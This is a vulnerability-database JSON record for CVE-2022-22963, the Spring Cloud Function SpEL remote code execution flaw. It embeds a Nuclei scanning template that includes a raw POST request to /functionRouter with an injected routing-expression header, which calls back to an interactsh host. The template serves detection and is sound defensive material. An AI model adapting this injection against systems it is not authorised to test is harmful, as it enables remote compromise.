{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-22963/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-22963/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-22963/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-22963/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-22963/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-22963"},"sightings":{"href":"/api/v1/sightings/cve-2022-22963"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-22963.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2022-22963\n\ninfo:\n  name: Spring Cloud - Remote Code Execution\n  author: Mr-xn,Adam Crosser\n  severity: critical\n  description: |\n    Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n  remediation: |\n    Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability.\n  reference:\n    - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f\n    - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE\n    - https://tanzu.vmware.com/security/cve-2022-22963\n    - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/\n    - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-22963\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-22963\n    cwe-id: CWE-94,CWE-917\n    epss-score: 0.99939\n    epss-percentile: 0.99971\n    cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: vmware\n    product: spring_cloud_function\n  tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /functionRouter HTTP/1.1\n        Host: {{Hostname}}\n        spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")\n        Content-Type: application/x-www-form-urlencoded\n\n        {{rand_base(8)}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n          - \"dns\"\n        condition: or\n\n      - type: status\n        status:\n          - 500\n# digest: 490a00463044022033204c87fa941009c403a50ba6a2c154903cd74718a97348661a677feff3fd1f022021b28eb6c71b71648084eea7f35eb2316995d8a022b6735c8ed267a59594257f:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2022-22963"}